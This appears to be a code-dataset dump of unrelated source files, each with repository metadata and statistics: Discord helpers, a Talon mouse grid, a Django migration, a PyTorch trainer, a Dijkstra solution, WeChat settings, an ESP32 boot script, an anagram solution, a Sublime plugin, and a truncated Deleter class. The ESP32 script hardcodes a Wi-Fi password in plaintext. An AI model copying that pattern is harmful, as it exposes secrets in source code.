[ "MIT" ]
null
null
null
botpumpkin/discord/context.py
Anthrasite/BotPumpkin
99267a9cb3d263f5cd302ee548c49c59fafcce3f
[ "MIT" ]
24
2021-03-08T00:28:13.000Z
2021-04-09T22:26:26.000Z
botpumpkin/discord/context.py
Anthrasite/BotPumpkin
99267a9cb3d263f5cd302ee548c49c59fafcce3f
[ "MIT" ]
null
null
null
"""A collection of utility functions for performing typing and error checking on discord.ext.commands.Context objects.""" from typing import List, Optional, Union # Third party imports import discord from discord.ext import commands # First party imports import botpumpkin.discord.guild as guild_util # *** get_guild ************************************************************* def get_guild(context: commands.Context) -> discord.Guild: """Return the guild from the given context. Args: context (commands.Context): The context to return the guild from. Raises: ValueError: Raised if the context contains no guild. Returns: discord.Guild: The guild from the given context. """ guild: Optional[discord.Guild] = context.guild if guild is None: raise ValueError("context.guild has no value") return guild # *** get_guild_channels **************************************************** def get_guild_channels(context: commands.Context) -> List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]: """Return a list of all channels from the given context. Args: context (commands.Context): The context to return all channels from. Raises: ValueError: Raised if the guild from the given context has no list of channels. Returns: List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]]: The list of channels from the given context. """ channels: List[Union[discord.TextChannel, discord.VoiceChannel, discord.CategoryChannel, discord.StoreChannel]] = get_guild(context).channels if channels is None: raise ValueError("context.guild.channels has no value") return channels # *** get_channel *********************************************************** def get_channel(context: commands.Context) -> discord.TextChannel: """Return the channel from the given context. Args: context (commands.Context): The context to return the channel from. Raises: ValueError: Raised if the channel is not a TextChannel, which means the channel is not from a guild. Returns: discord.TextChannel: The channel from the given context. """ channel: Union[discord.TextChannel, discord.DMChannel, discord.GroupChannel] = context.channel if not isinstance(channel, discord.TextChannel): raise ValueError("Channel is not from guild") return channel # *** get_channel_by_name *************************************************** def get_channel_by_name(context: commands.Context, channel_name: str) -> discord.TextChannel: """Return the channel from the list of channels in the given context that has the given name. Args: context (commands.Context): The context to return the channel from. channel_name (int): The name of the channel to return. Returns: discord.TextChannel: The channel with the given name from the given context. """ return guild_util.get_channel_by_name(get_guild(context), channel_name) # *** get_author ************************************************************ def get_author(context: commands.Context) -> discord.Member: """Return the member who sent the message for the given context. Args: context (commands.Context): The context to return the author from. Returns: discord.Member: The author for the given context. """ author: Union[discord.User, discord.Member] = context.author if not isinstance(author, discord.Member): raise ValueError("Author is not from guild") return author
36.068627
155
0.662136
437
3,679
5.514874
0.171625
0.043154
0.068465
0.063071
0.431535
0.375519
0.274689
0.243568
0.243568
0.243568
0
0
0.186192
3,679
101
156
36.425743
0.804943
0.544441
0
0
0
0
0.073041
0.014608
0
0
0
0
0
1
0.192308
false
0
0.153846
0
0.538462
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
1
0
0
1
8229dbbb6f0052b556f0fa37fd3095bf537d9605
5,180
py
Python
fine_grid.py
daveweij/fine_mouse_grid_talon
d13d942f977d06d8f17d9a14988811bae69ac2cd
[ "MIT" ]
null
null
null
fine_grid.py
daveweij/fine_mouse_grid_talon
d13d942f977d06d8f17d9a14988811bae69ac2cd
[ "MIT" ]
null
null
null
fine_grid.py
daveweij/fine_mouse_grid_talon
d13d942f977d06d8f17d9a14988811bae69ac2cd
[ "MIT" ]
null
null
null
import typing
import os
import json

from talon import Module, Context, canvas, screen, ui, ctrl, settings
from talon.skia import Paint, Rect
from talon.types.point import Point2d

mod = Module()
ctx = Context()

mod.tag('fine_grid_enabled', desc='Tag enables fine grid commands')


class FineMouseGrid:
    ZOOM_RATIO = 0.6

    def __init__(self):
        self.screen = None
        self.mcanvas = None
        self.rect = None
        self.active = False
        letters = [chr(97 + i) for i in range(26)]
        numbers = [str(i) for i in range(10)]
        self.columns = letters + numbers
        self.rows = letters + numbers

    def setup(self, *, screen_num: int = None):
        screens = ui.screens()
        # each if block here might set the rect to None to indicate failure
        if screen_num is not None:
            screen = screens[screen_num % len(screens)]
        else:
            screen = screens[0]
        if not self.rect:
            rect = screen.rect
            self.rect = rect.copy()
        self.screen = screen
        if self.mcanvas is not None:
            self.mcanvas.close()
        self.mcanvas = canvas.Canvas.from_screen(screen)
        self.mcanvas.register("draw", self.draw)
        self.mcanvas.freeze()

    def draw(self, canvas):
        def draw_text(offset_x, offset_y, width, height):
            row_height = height / len(self.rows)
            column_width = width / len(self.columns)
            canvas.paint.text_align = canvas.paint.TextAlign.CENTER
            canvas.paint.textsize = 16
            for row, row_char in enumerate(self.rows):
                for col, col_char in enumerate(self.columns):
                    coordinate_x = offset_x + column_width * (col + 0.5)
                    coordinate_y = offset_y + row_height * (row + 0.5)
                    text_string = f"{row_char}{col_char}"
                    text_rect = canvas.paint.measure_text(text_string)[1]
                    background_rect = text_rect.copy()
                    background_rect.center = Point2d(
                        coordinate_x,
                        coordinate_y,
                    )
                    background_rect = background_rect.inset(-4)
                    canvas.paint.color = "9999994f"
                    canvas.paint.style = Paint.Style.FILL
                    canvas.draw_rect(background_rect)
                    canvas.paint.color = "00ff008f"
                    canvas.draw_text(
                        text_string,
                        coordinate_x,
                        coordinate_y + text_rect.height / 2,
                    )

        draw_text(self.rect.x, self.rect.y, self.rect.width, self.rect.height)
        self.active = True

    def close(self):
        self.mcanvas.unregister("draw", self.draw)
        self.mcanvas.close()
        self.mcanvas = None
        self.active = False

    def reset(self):
        self.rect = None
        self.redraw()

    def redraw(self):
        self.close()
        self.setup()
        self.draw(self.mcanvas)

    def get_coordinate(self, row: str, column: str):
        column_index = self.columns.index(column)
        row_index = self.rows.index(row)
        x = self.rect.x + self.rect.width * (column_index + 0.5) / len(self.columns)
        y = self.rect.y + self.rect.height * (row_index + 0.5) / len(self.rows)
        return x, y

    def go_coordinate(self, row: str, column: str):
        ctrl.mouse_move(*self.get_coordinate(row, column))

    def zoom(self, row: str, column: str):
        x, y = self.get_coordinate(row, column)

        xnew_min = self.rect.x
        xnew_max = self.rect.x + (1 - self.ZOOM_RATIO)*self.rect.width
        xnew = x - 0.5*self.ZOOM_RATIO*self.rect.width
        self.rect.x = max(min(xnew, xnew_max), xnew_min)

        ynew_min = self.rect.y
        ynew_may = self.rect.y + (1 - self.ZOOM_RATIO)*self.rect.height
        ynew = y - 0.5*self.ZOOM_RATIO*self.rect.height
        self.rect.y = max(min(ynew, ynew_may), ynew_min)

        self.rect.width = self.ZOOM_RATIO*self.rect.width
        self.rect.height = self.ZOOM_RATIO*self.rect.height
        self.redraw()


grid = FineMouseGrid()


@mod.capture(rule="(<user.letter> | <user.number_key>) (<user.letter> | <user.number_key>)")
def coordinate(m) -> str:
    "column or row character"
    return ','.join(m)


@mod.action_class
class GridActions:
    def fine_grid_activate():
        """activate chess board"""
        ctx.tags = ['user.fine_grid_enabled']
        grid.rect = None
        if not grid.mcanvas:
            grid.setup()
        grid.draw(grid.mcanvas)

    def fine_grid_close():
        """Close the chessboard"""
        print(ctx.tags)
        grid.close()
        ctx.tags = []

    def go_coordinate(coordinate: str):
        """select coordinate"""
        print(coordinate)
        row, column = coordinate.split(',')
        grid.go_coordinate(row, column)

    def zoom(coordinate: str):
        """zoom"""
        row, column = coordinate.split(',')
        grid.zoom(row, column)

    def fine_grid_reset():
        """reset grid to original state"""
        grid.reset()
31.585366
92
0.570463
647
5,180
4.440495
0.224111
0.072398
0.027149
0.035503
0.237731
0.098851
0.05952
0.023669
0
0
0
0.011861
0.316409
5,180
163
93
31.779141
0.799492
0.035521
0
0.113821
0
0.00813
0.04205
0.004405
0
0
0
0
0
1
0.130081
false
0
0.04878
0
0.219512
0.01626
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822a62340464846a070b674b57e4a94852e76fd0
2,261
py
Python
molo/surveys/migrations/0014_update_skip_logic.py
praekelt/molo.surveys
c86d231f7cee669eb1c91db49ec05cf711984e30
[ "BSD-3-Clause" ]
null
null
null
molo/surveys/migrations/0014_update_skip_logic.py
praekelt/molo.surveys
c86d231f7cee669eb1c91db49ec05cf711984e30
[ "BSD-3-Clause" ]
88
2016-06-14T18:36:18.000Z
2018-09-21T07:33:58.000Z
molo/surveys/migrations/0014_update_skip_logic.py
praekeltfoundation/molo.surveys
c86d231f7cee669eb1c91db49ec05cf711984e30
[ "BSD-3-Clause" ]
1
2017-10-02T09:27:45.000Z
2017-10-02T09:27:45.000Z
# -*- coding: utf-8 -*-
# Generated by Django 1.9.13 on 2017-10-11 13:10
from __future__ import unicode_literals

from django.db import migrations
import molo.surveys.blocks
import wagtail.core.blocks


class Migration(migrations.Migration):

    dependencies = [
        ('surveys', '0013_add_streamfield_for_skip_logic'),
    ]

    operations = [
        migrations.AlterModelOptions(
            name='molosurveyformfield',
            options={'ordering': ['sort_order']},
        ),
        migrations.AlterModelOptions(
            name='personalisablesurveyformfield',
            options={'ordering': ['sort_order'], 'verbose_name': 'personalisable form field'},
        ),
        migrations.AlterField(
            model_name='molosurveyformfield',
            name='skip_logic',
            field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'),
        ),
        migrations.AlterField(
            model_name='personalisablesurveyformfield',
            name='skip_logic',
            field=molo.surveys.blocks.SkipLogicField([(b'skip_logic', wagtail.core.blocks.StructBlock([(b'choice', wagtail.core.blocks.CharBlock()), (b'skip_logic', wagtail.core.blocks.ChoiceBlock(choices=[(b'next', b'Next default question'), (b'end', b'End of survey'), (b'question', b'Another question'), (b'survey', b'Another survey')])), (b'survey', wagtail.core.blocks.PageChooserBlock(required=False, target_model='surveys.MoloSurveyPage')), (b'question', molo.surveys.blocks.QuestionSelectBlock(help_text=b'Please save the survey as a draft to populate or update the list of questions.', required=False))]))], blank=True, verbose_name=b'Answer options'),
        ),
    ]
62.805556
661
0.693941
269
2,261
5.732342
0.319703
0.064202
0.099222
0.044099
0.649805
0.649805
0.649805
0.649805
0.649805
0.649805
0
0.011012
0.156568
2,261
35
662
64.6
0.797588
0.030075
0
0.428571
1
0
0.323744
0.062557
0
0
0
0
0
1
0
false
0
0.142857
0
0.25
0
0
0
0
null
0
0
0
0
0
0
0
0
1
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
2
822a641495e4387a0c1f14cf9ebd06d65a7a819c
7,355
py
Python
jdit/trainer/single/sup_single.py
dingguanglei/jdit
ef878e696c9e2fad5069f106496289d4e4cc6154
[ "Apache-2.0" ]
28
2019-06-18T15:56:53.000Z
2021-11-09T13:11:13.000Z
jdit/trainer/single/sup_single.py
dingguanglei/jdit
ef878e696c9e2fad5069f106496289d4e4cc6154
[ "Apache-2.0" ]
2
2018-10-24T01:09:56.000Z
2018-11-08T07:13:48.000Z
jdit/trainer/single/sup_single.py
dingguanglei/jdit
ef878e696c9e2fad5069f106496289d4e4cc6154
[ "Apache-2.0" ]
8
2019-01-11T01:12:15.000Z
2021-03-12T10:15:43.000Z
from ..super import SupTrainer
from tqdm import tqdm
import torch
from jdit.optimizer import Optimizer
from jdit.model import Model
from jdit.dataset import DataLoadersFactory


class SupSingleModelTrainer(SupTrainer):
    """ This is a Single Model Trainer. It means you only have one model.

    input, ground_truth
    output = model(input)
    loss(output, ground_truth)
    """

    def __init__(self, logdir, nepochs, gpu_ids_abs, net: Model, opt: Optimizer, datasets: DataLoadersFactory):
        super(SupSingleModelTrainer, self).__init__(nepochs, logdir, gpu_ids_abs=gpu_ids_abs)
        self.net = net
        self.opt = opt
        self.datasets = datasets
        self.fixed_input = None
        self.input = None
        self.output = None
        self.ground_truth = None

    def train_epoch(self, subbar_disable=False):
        for iteration, batch in tqdm(enumerate(self.datasets.loader_train, 1), unit="step", disable=subbar_disable):
            self.step += 1
            self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
            self.output = self.net(self.input)
            self._train_iteration(self.opt, self.compute_loss, csv_filename="Train")
            if iteration == 1:
                self._watch_images("Train")

    def get_data_from_batch(self, batch_data: list, device: torch.device):
        """ Load and wrap data from the data loader.

        Split your one batch data to specify variable.

        Example::

            # batch_data like this [input_Data, ground_truth_Data]
            input_cpu, ground_truth_cpu = batch_data[0], batch_data[1]
            # then move them to device and return them
            return input_cpu.to(self.device), ground_truth_cpu.to(self.device)

        :param batch_data: one batch data load from ``DataLoader``
        :param device: A device variable. ``torch.device``
        :return: input Tensor, ground_truth Tensor
        """
        input_tensor, ground_truth_tensor = batch_data[0], batch_data[1]
        return input_tensor, ground_truth_tensor

    def _watch_images(self, tag: str, grid_size: tuple = (3, 3), shuffle=False, save_file=True):
        """ Show images in tensorboard

        To show images in tensorboad. If want to show fixed input and it's output,
        please use ``shuffle=False`` to fix the visualized data.
        Otherwise, it will sample and visualize the data randomly.

        Example::

            # show fake data
            self.watcher.image(self.output,
                               self.current_epoch,
                               tag="%s/output" % tag,
                               grid_size=grid_size,
                               shuffle=shuffle,
                               save_file=save_file)
            # show ground_truth
            self.watcher.image(self.ground_truth,
                               self.current_epoch,
                               tag="%s/ground_truth" % tag,
                               grid_size=grid_size,
                               shuffle=shuffle,
                               save_file=save_file)
            # show input
            self.watcher.image(self.input,
                               self.current_epoch,
                               tag="%s/input" % tag,
                               grid_size=grid_size,
                               shuffle=shuffle,
                               save_file=save_file)

        :param tag: tensorboard tag
        :param grid_size: A tuple for grad size which data you want to visualize
        :param shuffle: If shuffle the data.
        :param save_file: If save this images.
        :return:
        """
        self.watcher.image(self.output,
                           self.current_epoch,
                           tag="%s/output" % tag,
                           grid_size=grid_size,
                           shuffle=shuffle,
                           save_file=save_file)
        self.watcher.image(self.ground_truth,
                           self.current_epoch,
                           tag="%s/ground_truth" % tag,
                           grid_size=grid_size,
                           shuffle=shuffle,
                           save_file=save_file)

    def compute_loss(self) -> (torch.Tensor, dict):
        """ Rewrite this method to compute your own loss Discriminator.

        Use self.input, self.output and self.ground_truth to compute loss.
        You should return a **loss** for the first position.
        You can return a ``dict`` of loss that you want to visualize on the second position, like

        Example::

            var_dic = {}
            var_dic["LOSS"] = loss_d = (self.output ** 2 - self.ground_truth ** 2) ** 0.5
            return loss, var_dic

        """
        # NOTE: placeholder; subclasses must assign ``loss`` before returning (see docstring).
        loss: torch.Tensor
        var_dic = {}
        return loss, var_dic

    def compute_valid(self) -> dict:
        """ Rewrite this method to compute your validation values.

        Use self.input, self.output and self.ground_truth to compute valid loss.
        You can return a ``dict`` of validation values that you want to visualize.

        Example::

            # It will do the same thing as ``compute_loss()``
            var_dic, _ = self.compute_loss()
            return var_dic

        """
        # It will do the same thing as ``compute_loss()``
        var_dic, _ = self.compute_loss()
        return var_dic

    def valid_epoch(self):
        """Validate model each epoch.

        It will be called each epoch, when training finish.
        So, do the same verification here.

        Example::

            avg_dic: dict = {}
            self.net.eval()
            for iteration, batch in enumerate(self.datasets.loader_valid, 1):
                self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
                with torch.no_grad():
                    self.output = self.net(self.input)
                    dic: dict = self.compute_valid()
                if avg_dic == {}:
                    avg_dic: dict = dic
                else:
                    for key in dic.keys():
                        avg_dic[key] += dic[key]

            for key in avg_dic.keys():
                avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid

            self.watcher.scalars(avg_dic, self.step, tag="Valid")
            self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.step <= 1)
            self._watch_images(tag="Valid")
            self.net.train()

        """
        avg_dic: dict = {}
        self.net.eval()
        for iteration, batch in enumerate(self.datasets.loader_valid, 1):
            self.input, self.ground_truth = self.get_data_from_batch(batch, self.device)
            with torch.no_grad():
                self.output = self.net(self.input)
                dic: dict = self.compute_valid()
            if avg_dic == {}:
                avg_dic: dict = dic
            else:
                # sum up
                for key in dic.keys():
                    avg_dic[key] += dic[key]

        for key in avg_dic.keys():
            avg_dic[key] = avg_dic[key] / self.datasets.nsteps_valid

        self.watcher.scalars(avg_dic, self.step, tag="Valid")
        self.loger.write(self.step, self.current_epoch, avg_dic, "Valid", header=self.current_epoch <= 1)
        self._watch_images(tag="Valid")
        self.net.train()

    def test(self):
        pass
37.146465
116
0.562882
885
7,355
4.501695
0.19096
0.027108
0.03012
0.023845
0.500251
0.477159
0.433986
0.416918
0.416918
0.398845
0
0.003537
0.346431
7,355
197
117
37.335025
0.825255
0.4707
0
0.176471
0
0
0.016552
0
0
0
0
0
0
1
0.117647
false
0.014706
0.088235
0
0.264706
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822adefd2d61243c8a6b7d51a859f435ee02768e
1,433
py
Python
Gold/sol.py
papachristoumarios/IEEEXtreme11.0
4c3b5aaa71641a6d0b3e9823c4738050f2553b27
[ "MIT" ]
13
2018-10-11T14:13:56.000Z
2022-02-17T18:30:17.000Z
Gold/sol.py
papachristoumarios/IEEEXtreme11.0-PComplete
4c3b5aaa71641a6d0b3e9823c4738050f2553b27
[ "MIT" ]
null
null
null
Gold/sol.py
papachristoumarios/IEEEXtreme11.0-PComplete
4c3b5aaa71641a6d0b3e9823c4738050f2553b27
[ "MIT" ]
7
2018-10-24T08:36:59.000Z
2021-07-19T18:16:53.000Z
import heapq
import sys

primes = [2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53]
bounds = [1]
for pr in primes:
    bounds.append(bounds[-1] * pr)


def gold(town_id):
    i = 0
    while bounds[i] <= town_id:
        i += 1
    return i - 1


def solve():
    # Ported from Python 2: raw_input/xrange/sys.maxint replaced with
    # their Python 3 equivalents.
    N, M = [int(i) for i in input().split()]
    ids = [int(input()) for _ in range(N)]
    town_gold = {town_id: gold(town_id) for town_id in ids}
    adj = {}
    for i in ids:
        adj[i] = []
    for _ in range(M):
        i, j, w = [int(i) for i in input().split()]
        adj[i].append((j, w))
        adj[j].append((i, w))
    start, end = min(ids), max(ids)
    visited = set()
    max_dist = sys.maxsize // 2
    min_dist = {town_id: max_dist for town_id in ids}
    min_dist[start] = 0
    # Dijkstra keyed on (distance, -gold): among equal distances the
    # entry with the most gold is popped first.
    queue = [(0, -gold(start), start)]
    while queue:
        curr_dist, curr_gold, curr_node = heapq.heappop(queue)
        if curr_node in visited:
            continue
        visited.add(curr_node)  # settle the node so it is not expanded again
        if curr_node == end:
            print(-curr_gold)
            break
        for next_node, dist in adj[curr_node]:
            if next_node in visited:
                continue
            next_dist = curr_dist + dist
            if min_dist[next_node] >= next_dist:
                min_dist[next_node] = next_dist
                heapq.heappush(queue, (next_dist, curr_gold - town_gold[next_node], next_node))


def main():
    solve()


if __name__ == "__main__":
    main()
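The bounds list above holds the primorials 1, 2, 6, 30, 210, ..., so gold(town_id) is the largest k with bounds[k] <= town_id; a quick check:

assert gold(1) == 0
assert gold(5) == 1   # 2 <= 5 < 6
assert gold(6) == 2   # 6 <= 6 < 30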
26.537037
93
0.551291
222
1,433
3.346847
0.297297
0.056528
0.040377
0.021534
0.161507
0.123822
0.061911
0.061911
0
0
0
0.036735
0.31612
1,433
53
94
27.037736
0.721429
0
0
0.043478
0
0
0.005583
0
0
0
0
0
0
1
0.065217
false
0
0.043478
0
0.130435
0.021739
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822bbf9836e86e5cf6fb48c971df002aa5f8085b
511
py
Python
src/wechat/settings.py
chuter/wechat-requests
23591f8e04e795a1727e6a8029602cfb2dde90f1
[ "MIT" ]
3
2019-06-17T10:54:03.000Z
2021-01-29T08:25:01.000Z
src/wechat/settings.py
chuter/wechat-requests
23591f8e04e795a1727e6a8029602cfb2dde90f1
[ "MIT" ]
2
2020-03-24T15:46:37.000Z
2020-03-30T20:26:19.000Z
src/wechat/settings.py
chuter/wechat-requests
23591f8e04e795a1727e6a8029602cfb2dde90f1
[ "MIT" ]
null
null
null
# -*- encoding: utf-8
from .utils import build_user_agent

# common
DEFAULT_HEADERS = {
    'User-Agent': build_user_agent()
}
TIMEOUT = 1
ENCODING = 'utf-8'
RETRYS = 3
RETRY_BACKOFF_FACTOR = 0.1
RETRY_STATUS_FORCELIST = frozenset([500, 502, 504])

# auth
OAUTH_HOST = 'open.weixin.qq.com'
AUTH_EXPIRED_CODES = frozenset([40001, 40014, 41001, 42001])

# pay
TRADE_TYPE_JSAPI = 'JSAPI'    # official-account payment
TRADE_TYPE_NATIVE = 'NATIVE'  # QR-code payment
TRADE_TYPE_APP = 'APP'        # in-app payment
SIGN_TYPE = 'MD5'
SIGN_NONCE_STR_LEN = 32
17.033333
60
0.712329
75
511
4.56
0.72
0.078947
0.070175
0
0
0
0
0
0
0
0
0.088785
0.162427
511
29
61
17.62069
0.71028
0.101761
0
0
0
0
0.110865
0
0
0
0
0
0
1
0
false
0
0.0625
0
0.0625
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822c0a167631eafd04070f9a246d9fdcf6b1dbe4
533
py
Python
esp32/tempsensor/boot.py
Steve-Fisher/PiExperiments
81a08b99b53ed9921353cf436b09b40650032a2b
[ "MIT" ]
null
null
null
esp32/tempsensor/boot.py
Steve-Fisher/PiExperiments
81a08b99b53ed9921353cf436b09b40650032a2b
[ "MIT" ]
null
null
null
esp32/tempsensor/boot.py
Steve-Fisher/PiExperiments
81a08b99b53ed9921353cf436b09b40650032a2b
[ "MIT" ]
null
null
null
try:
    import usocket as socket
except:
    import socket
from time import sleep
from machine import Pin
import onewire, ds18x20
import network
import esp
esp.osdebug(None)
import gc
gc.collect()

ds_pin = Pin(4)
ds_sensor = ds18x20.DS18X20(onewire.OneWire(ds_pin))

ssid = 'ATC24'
password = 'Svalbard'

station = network.WLAN(network.STA_IF)
station.active(True)
station.connect(ssid, password)

while station.isconnected() == False:
    pass

#print(station.ifconfig())
print('Connection successful')
print(station.ifconfig())
15.228571
52
0.756098
73
533
5.465753
0.561644
0.025063
0.100251
0
0
0
0
0
0
0
0
0.032538
0.135084
533
35
53
15.228571
0.832972
0.046904
0
0
0
0
0.066929
0
0
0
0
0
0
1
0
false
0.130435
0.347826
0
0.347826
0.086957
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
1
1
0
0
0
0
2
822c63b5e55693f8beb5a21c86e5722b43fcabfd
1,070
py
Python
leetcode/0242_valid_anagram.py
chaosWsF/Python-Practice
ff617675b6bcd125933024bb4c246b63a272314d
[ "BSD-2-Clause" ]
null
null
null
leetcode/0242_valid_anagram.py
chaosWsF/Python-Practice
ff617675b6bcd125933024bb4c246b63a272314d
[ "BSD-2-Clause" ]
null
null
null
leetcode/0242_valid_anagram.py
chaosWsF/Python-Practice
ff617675b6bcd125933024bb4c246b63a272314d
[ "BSD-2-Clause" ]
null
null
null
""" Given two strings s and t , write a function to determine if t is an anagram of s. Example 1: Input: s = "anagram", t = "nagaram" Output: true Example 2: Input: s = "rat", t = "car" Output: false Note: You may assume the string contains only lowercase alphabets. Follow up: What if the inputs contain unicode characters? How would you adapt your solution to such case? """ from collections import Counter class Solution: def isAnagram1(self, s, t): return sorted(s) == sorted(t) def isAnagram2(self, s, t): if len(s) != len(t): return False d_s = {} d_t = {} for ss, tt in zip(s, t): if ss in d_s: d_s[ss] += 1 else: d_s[ss] = 1 if tt in d_t: d_t[tt] += 1 else: d_t[tt] = 1 return d_s == d_t def isAnagram3(self, s, t): # 28ms, 13MB return Counter(s) == Counter(t) if len(s) == len(t) else False
22.291667
98
0.507477
155
1,070
3.43871
0.464516
0.018762
0.033771
0.026266
0.041276
0.041276
0
0
0
0
0
0.02
0.392523
1,070
47
99
22.765957
0.8
0.382243
0
0.095238
0
0
0
0
0
0
0
0
0
1
0.142857
false
0
0.047619
0.095238
0.428571
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
822e6649f5126724e28587501bc18c3cf971a81b
4,144
py
Python
phpcsfixer.py
makao/sublime-php-cs-fixer
ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5
[ "MIT" ]
1
2018-11-26T19:42:41.000Z
2018-11-26T19:42:41.000Z
phpcsfixer.py
makao/sublime-php-cs-fixer
ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5
[ "MIT" ]
2
2018-01-10T05:15:08.000Z
2018-12-04T15:41:29.000Z
phpcsfixer.py
makao/sublime-php-cs-fixer
ff3227a2877a3e59c5bf9fc6e10f7aef56db8ef5
[ "MIT" ]
null
null
null
import os
import re
import sublime
import sublime_plugin
import subprocess

STVER = int(sublime.version())


class PHPCSFixer():
    def __init__(self):
        self.settings = PhpCsFixerSettings()
        if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
            self.file = sublime.active_window().active_view().file_name()

    def run(self, file=None):
        if file is None:
            file = self.file

        if not self.settings.isPHPFile():
            return

        if not self.settings.isAllowedExtension(file):
            return

        cmd = self.buildCommand(file)
        result = self.execute(cmd)
        self.showOutput(result)

    def buildCommand(self, file):
        rules = self.settings.get('rules')

        if (self.settings.get('executable')):
            cmd = [self.settings.get('executable')]
        else:
            cmd = ['php-cs-fixer']

        cmd.append('fix')
        cmd.append(os.path.normpath(file))
        cmd.append('-vvv')
        cmd.append('--using-cache=no')

        if rules is None or not rules:
            return cmd

        rules_list = '--rules='
        for rule in rules:
            rules_list += rule + ','
        cmd.append(rules_list[:-1])

        return cmd

    def execute(self, cmd):
        process = subprocess.Popen(cmd, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        return process.communicate()[0].decode()

    def showOutput(self, result):
        # raw strings so the regex escapes are not mangled by Python
        lines = re.finditer(r'.*(?P<line>\d+)\) (?P<file>.*)', result)
        files = []
        for line in lines:
            file = line.group('file')
            rules = file[file.find("(")+1:file.find(")")]
            file = re.sub(r'\(.*?\)', '', file)
            files.append([os.path.basename(file), rules])
        sublime.active_window().show_quick_panel(files, self.onDone)

    def onDone(self, selected):  # ``self`` must be the first parameter
        return


class PhpCsFixerFixCommand(sublime_plugin.TextCommand):
    def run(self, edit):  # ``self`` must be the first parameter
        PHPCSFixer().run()


class PhpCsFixerEventListener(sublime_plugin.EventListener):
    def on_post_save(self, view):
        settings = PhpCsFixerSettings()
        if not settings.get('on_save'):
            return
        PHPCSFixer().run(view.file_name())


class PhpCsFixerSettings():
    def __init__(self):
        if sublime.active_window() is not None and sublime.active_window().active_view() is not None:
            self.sublime = sublime.active_window().active_view().settings()
            self.project = self.sublime.get('php-cs-fixer')
        else:
            self.sublime = {}
            self.project = {}
        self.plugin = sublime.load_settings('PHPCSFixer.sublime-settings')

    def get(self, key, default=None):
        if self.project is not None and self.project.get(key) is not None:
            return self.project.get(key)
        if self.plugin.get(key) is not None:
            return self.plugin.get(key)
        return default

    def isPHPFile(self):
        syntax = self.sublime.get('syntax')
        if syntax is None:
            return False
        if syntax.endswith('PHP.tmLanguage') or syntax.endswith('PHP.sublime-syntax'):
            return True
        return False

    def isAllowedExtension(self, filename):
        ignored = self.get('ignored_extensions', [])
        for ext in ignored:
            if filename.endswith(ext):
                return False
        return True


class PhpCsFixerOpenFileCommand(sublime_plugin.ApplicationCommand):
    @staticmethod
    def run(file):
        platform_name = {
            'osx': 'OSX',
            'windows': 'Windows',
            'linux': 'Linux',
        }[sublime.platform()]
        file = file.replace('${platform}', platform_name)
        sublime.run_command('open_file', {'file': file})

    @staticmethod
    def is_visible():
        return STVER < 3124


class PhpCsFixerEditSettingsCommand(sublime_plugin.ApplicationCommand):
    @staticmethod
    def run(**kwargs):
        sublime.run_command('edit_settings', kwargs)

    @staticmethod
    def is_visible():
        return STVER >= 3124
27.812081
112
0.600386
464
4,144
5.267241
0.247845
0.037234
0.054419
0.040917
0.177578
0.153846
0.113748
0.061375
0.061375
0.061375
0
0.003663
0.275338
4,144
148
113
28
0.81019
0
0
0.211009
0
0
0.067809
0.006515
0
0
0
0
0
1
0.146789
false
0
0.045872
0.027523
0.40367
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
1
0
8231b27b0d3005be97ff413b652254876cb7dd03
686
py
Python
src/dal/deleter.py
pgecsenyi/piepy
37bf6cb5bc8c4f9da3f695216beda7353d79fb29
[ "MIT" ]
1
2018-03-26T22:39:36.000Z
2018-03-26T22:39:36.000Z
src/dal/deleter.py
pgecsenyi/piepy
37bf6cb5bc8c4f9da3f695216beda7353d79fb29
[ "MIT" ]
null
null
null
src/dal/deleter.py
pgecsenyi/piepy
37bf6cb5bc8c4f9da3f695216beda7353d79fb29
[ "MIT" ]
null
null
null
class Deleter:

    ####################################################################################################################
    # Constructor.
    ####################################################################################################################

    def __init__(self, db_context):
        """
        Initializes attributes.

        Parameters
        ----------
        db_context : DbContext
            The database context to work with.
        """

